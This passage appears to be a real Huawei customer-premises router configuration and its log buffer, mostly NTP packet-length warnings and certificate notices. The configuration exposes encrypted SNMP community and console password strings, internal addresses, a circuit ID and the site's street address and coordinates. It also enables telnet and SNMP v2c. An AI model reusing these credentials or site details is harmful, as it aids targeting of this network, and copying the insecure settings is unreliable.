 QOS CAR OUTBOUND CIR 5120 PIR 5120 CBS 1024000 PBS 2048000 GREEN PASS YELLOW PASS RED DISCARD
 DHCP SELECT GLOBAL
#
INTERFACE ETHERNET0/0/0
#
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION LAN CLIENTE
 SET FLOW-STAT INTERVAL 30
#
INTERFACE GIGABITETHERNET0/0/1
 DESCRIPTION LAN CLIENTE
#
INTERFACE GIGABITETHERNET0/0/2
 DESCRIPTION LAN CLIENTE
#
INTERFACE GIGABITETHERNET0/0/3
 DESCRIPTION LAN CLIENTE
#
INTERFACE GIGABITETHERNET0/0/4
 DESCRIPTION WAN PRINCIPAL/_/38300508T/_/
 SET FLOW-STAT INTERVAL 30
 BANDWIDTH 5120 KBPS
 IP ADDRESS 10.174.168.24 255.255.255.224
 NAT OUTBOUND 2001 ADDRESS-GROUP 1
#
INTERFACE GIGABITETHERNET0/0/5
 DESCRIPTION VIRTUALPORT
#
INTERFACE WLAN-BSS7
 PORT HYBRID TAGGED VLAN 1
#
INTERFACE NULL0
#
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.171.162 255.255.255.255
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB038C426DE99F4B
 SNMP-AGENT COMMUNITY READ %^%#NP-*3^"*Q$3Q8GNIEX4N~!KYF:Q.'(W$|{U^VV8@P6V,&amp;MU+J/L.LIK_7QDRA-GYRXRWOJ{DNO9=F4B2%^%# ACL 2988
 SNMP-AGENT SYS-INFO LOCATION INTERNET_170, 0 CALLE 3-15 ZONA 2 SANTA CATARINA PINULA 14.5699666667, -90.49566
 SNMP-AGENT SYS-INFO VERSION V2C
 SNMP-AGENT TRAP SOURCE LOOPBACK5
 SNMP-AGENT
#
 TELNET SERVER ENABLE
#
 SET WEB LOGIN-STYLE SIMPLE
 HTTP SECURE-SERVER SSL-POLICY DEFAULT_POLICY
 HTTP SERVER ENABLE
 HTTP SECURE-SERVER ENABLE
 HTTP SERVER PERMIT INTERFACE VLANIF1
#
IP ROUTE-STATIC 0.0.0.0 0.0.0.0 10.174.168.1 DESCRIPTION DEFAULT
#
FIB REGULARLY-REFRESH DISABLE
#
USER-INTERFACE CON 0
 AUTHENTICATION-MODE PASSWORD
 SET AUTHENTICATION PASSWORD CIPHER %^%#J@:YJE6$=2PF#'&lt;EQ45Z9K4R#V{~#&amp;CH'L/VP]L~I6CVWGQ\K;;B*CQA3G)Y%^%#
USER-INTERFACE VTY 0
 ACL 2005 INBOUND
 AUTHENTICATION-MODE AAA
 USER PRIVILEGE LEVEL 15
USER-INTERFACE VTY 1 4
 ACL 2005 INBOUND
 AUTHENTICATION-MODE AAA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170&gt;
LOG DEL ROUTER CPE:
DISPLAY LOGBUFFER
LOGGING BUFFER CONFIGURATION AND CONTENTS: ENABLED
ALLOWED MAX BUFFER SIZE: 1024
ACTUAL BUFFER SIZE: 512
CHANNEL NUMBER: 4, CHANNEL NAME: LOGBUFFER
DROPPED MESSAGES: 0
OVERWRITTEN MESSAGES: 8044
CURRENT MESSAGES: 512
MAR 22 2018 08:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[0]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 496 DAYS.
MAR 22 2018 07:42:07+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[1]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=4287827997, MODULENAME=PKI, INFOALIAS=LOCAL_VALID)
MAR 22 2018 06:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[2]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 496 DAYS.
MAR 22 2018 06:26:30+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[3]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 22 2018 05:55:48+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[4]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 22 2018 05:55:48+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[5]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 22 2018 05:51:38+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[6]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=12)
MAR 22 2018 05:51:14+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[7]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 22 2018 05:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[8]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 496 DAYS.
MAR 22 2018 05:40:20+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[9]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 22 2018 05:34:24+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[10]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=7)
MAR 22 2018 05:34:24+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[11]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 22 2018 05:34:19+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[12]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=10)
MAR 22 2018 05:34:19+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[13]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 22 2018 05:34:14+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[14]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
MAR 22 2018 05:34:14+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[15]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 22 2018 05:20:12+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[16]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 22 2018 05:20:12+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[17]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 22 2018 05:19:03+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[18]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=12)
MAR 22 2018 04:50:58+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01DEFD/4/CPCAR_DROP_MPU(L)[19]:SOME PACKETS ARE DROPPED BY CPCAR ON THE MPU. (PACKET-TYPE=TCP, DROP-COUNT=87)
MAR 22 2018 04:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[20]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 496 DAYS.
MAR 22 2018 04:30:00+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[21]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 22 2018 04:02:32+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[22]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 22 2018 03:47:50+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[23]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 22 2018 03:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[24]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 496 DAYS.
MAR 22 2018 03:33:53+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[25]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 22 2018 03:30:34+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[26]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 22 2018 03:30:34+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[27]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 22 2018 03:26:38+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[28]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 22 2018 03:22:30+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[29]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
MAR 22 2018 03:13:55+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[30]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 22 2018 03:11:28+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[31]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
MAR 22 2018 03:10:20+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[32]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 22 2018 02:57:06+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[33]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=12)
MAR 22 2018 02:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[34]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 496 DAYS.
MAR 22 2018 01:56:47+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[35]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 22 2018 01:56:47+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[36]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 22 2018 01:54:20+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[37]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
MAR 22 2018 01:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[38]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 496 DAYS.
MAR 22 2018 01:05:47+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[39]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 22 2018 00:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[40]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 496 DAYS.
MAR 21 2018 23:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[41]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 496 DAYS.
MAR 21 2018 23:22:49+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[42]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 23:19:08+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[43]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 23:10:20+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[44]:LAST MESSAGE REPEATED 5 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 22:57:38+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[45]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=9)
MAR 21 2018 22:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[46]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 496 DAYS.
MAR 21 2018 21:45:57+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[47]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 21:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[48]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 496 DAYS.
MAR 21 2018 21:06:34+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[49]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 20:54:03+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[50]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
MAR 21 2018 20:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[51]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 496 DAYS.
MAR 21 2018 20:40:20+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[52]:LAST MESSAGE REPEATED 5 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 20:35:57+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[53]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
MAR 21 2018 20:35:57+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[54]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 20:26:08+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[55]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 20:01:21+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[56]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 20:01:21+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[57]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 19:53:51+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[58]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 19:52:41+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[59]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
MAR 21 2018 19:46:09+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[60]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 19:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[61]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 496 DAYS.
MAR 21 2018 19:11:10+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[62]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 18:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[63]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 496 DAYS.
MAR 21 2018 18:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[64]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 18:25:06+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[65]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 17:44:20+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[66]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 17:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[67]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 497 DAYS.
MAR 21 2018 17:32:42+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[68]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 17:32:00+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[69]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 17:22:39+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[70]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 17:17:02+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[71]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
MAR 21 2018 17:03:00+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[72]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 17:03:00+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[73]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 16:59:34+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[74]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
MAR 21 2018 16:57:07+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[75]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 16:52:16+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[76]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 16:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[77]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 497 DAYS.
MAR 21 2018 16:10:20+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[78]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 15:45:45+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[79]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
MAR 21 2018 15:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[80]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 497 DAYS.
MAR 21 2018 15:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[81]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 15:39:06+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[82]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 15:32:48+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[83]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
MAR 21 2018 15:22:58+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[84]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 14:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[85]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 497 DAYS.
MAR 21 2018 13:42:12+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[86]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 13:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[87]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 497 DAYS.
MAR 21 2018 13:22:05+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[88]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 12:49:43+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[89]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 12:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[90]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 497 DAYS.
MAR 21 2018 11:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[91]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 497 DAYS.
MAR 21 2018 11:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[92]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 11:38:48+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[93]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 11:38:14+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[94]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
